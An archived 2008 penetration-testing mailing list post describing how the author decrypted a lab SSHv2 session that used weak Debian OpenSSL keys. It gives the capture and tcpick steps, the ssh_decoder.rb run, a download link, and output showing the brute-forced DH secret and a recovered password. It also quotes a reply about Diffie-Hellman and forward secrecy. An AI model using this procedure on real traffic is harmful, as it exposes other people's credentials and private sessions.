Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Penetration Testing: Re: How to decrypt a connection SSH v2?

Re: How to decrypt a connection SSH v2?

From: Ulises2k <ulises2k_at_gmail.com>
Date: Thu, 10 Jul 2008 17:38:07 -0300

Hi.
I do.
Thank very much at Raphaël Rigo, development ssh_decoder.[0]

I have 2 Virtual Machines, 1 ubuntu 8.04 server (no updated) and 1
ubuntu 8.04 client (no updated).
VM have vulnerability libssl discovery by Luciano Bello on May-2008.

Client TTY 1:
$ sudo wireshark

In other terminal (TTY2) exec:
$ssh 192.168.230.143
user_at_192.168.230.143's password:
Last login: Wed Jul 9 17:10:04 2008 from 192.168.230.144
user_at_ubuntu804server:~$ echo "este es un comando tirado en el server"
user_at_ubuntu804server:~$ exit

Client TTY1:
$Stop sniffing Wireshark.
Save file "sshv2.cap"

$ tcpick -wRC -wRS -r sshv2.cap
Starting tcpick 0.2.1 at 2008-07-10 14:14 EDT
Timeout for connections is 600
tcpick: reading from sshv2.cap
1 SYN-SENT 192.168.230.144:44550 > 192.168.230.143:ssh
1 SYN-RECEIVED 192.168.230.144:44550 > 192.168.230.143:ssh
1 ESTABLISHED 192.168.230.144:44550 > 192.168.230.143:ssh
1 FIN-WAIT-1 192.168.230.144:44550 > 192.168.230.143:ssh
1 TIME-WAIT 192.168.230.144:44550 > 192.168.230.143:ssh
1 CLOSED 192.168.230.144:44550 > 192.168.230.143:ssh
tcpick: done reading from sshv2.cap

81 packets captured
1 tcp sessions detected

$ ruby ssh_decoder.rb tcpick*
 * read handshake
cipher: aes128-cbc, mac: hmac-md5, kex_hash: sha256, compr: none
 * bruteforce DH
DH shared secret :
63368d70f36fca060daa9d83b67f68bdd3cd9a4a150b27bfa51689f091b5d8857eb3b93057430be1577e45bb742b4528dca889cbda21de1ab2ec0ba1e364b421aa2797c1ad4667a66c7b20317842b5c509160a38629ae551e128b64e4af73d5ce7331342d8d9bd6128c3c89e0d2a55b6c4c5b7da06eead4dee4e3eb5d01d1210
 * derive keys
 * decipher streams
 * successful authentication packet
{:username=>"user",
 :nextservice=>"ssh-connection",
 :auth_method=>"password",
 :change=>0,
 :password=>"superpassword"}
 * deciphered streams saved to "sshdecrypt.0.client.dat" &
"sshdecrypt.0.server.dat"

User: User
Password: superpassword

In sshdecrypt.0.client.dat and sshdecrypt.0.server.dat all text
plane.(user/password/command)

The script (ssh_decoder and ssh_kex_keygen ) generate private key.

Dowload ssh_decoder and ssh_kex_keygen [0]

[0]http://www.cr0.org/progs/sshfun/

Thank you very much. 

--
Ulises U. Cuñé
Web: http://www.ulises2k.com.ar
On Thu, Jul 10, 2008 at 14:25, Gary E. Miller <gem_at_rellim.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Yo Paul!
>
> On Thu, 10 Jul 2008, Paul Melson wrote:
>
>> > I assume if the attacker has the public and private keys from not just
>> > one, but both ends, that PFS is not an obstacle.
>
>> It's my understanding that even if you have both endpoints' public and
>> private key pairs, that's not enough to recreate the ephemeral keys used
>> during a particular session.  Without those keys, the packet capture cannot
>> be decrypted.
>
> Read the RFC and tell me that again:
>        http://tools.ietf.org/html/rfc4253#section-8
>
>        "The Diffie-Hellman (DH) key exchange provides a shared secret
>        that cannot be determined by either party alone. "
>                                  ^^^^^^^^^^^^^^^^^^^^^^
>
> The whole point if the key exchange is to use both sets of
> public/private keys to generate this shared secret, and only those 4
> keys.  If you possess those 4 keys then game over, you can decode the
> shared key.
>
> Looks to me that the RFC tells you all you need to know to recover
> the shared secret.    If someone had some time on their hands
> they could probably grab most of the needed code out of the openssh
> code.
>
> RGDS
> GARY
> - ---------------------------------------------------------------------------
> Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701
>        gem_at_rellim.com  Tel:+1(541)382-8588
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.3 (GNU/Linux)
>
> iD8DBQFIdkX/8KZibdeR3qURAqX2AJoDno9k9Onk6W5ZpGbMF1eCxKBGBwCZAYA2
> bDDCaensdMGUAl9j+ZaWz7o=
> =CXfX
> -----END PGP SIGNATURE-----
>
>
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Top 5 Common Mistakes in 
Securing Web Applications
Get 45 Min Video and PPT Slides
www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
Received on Jul 10 2008
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos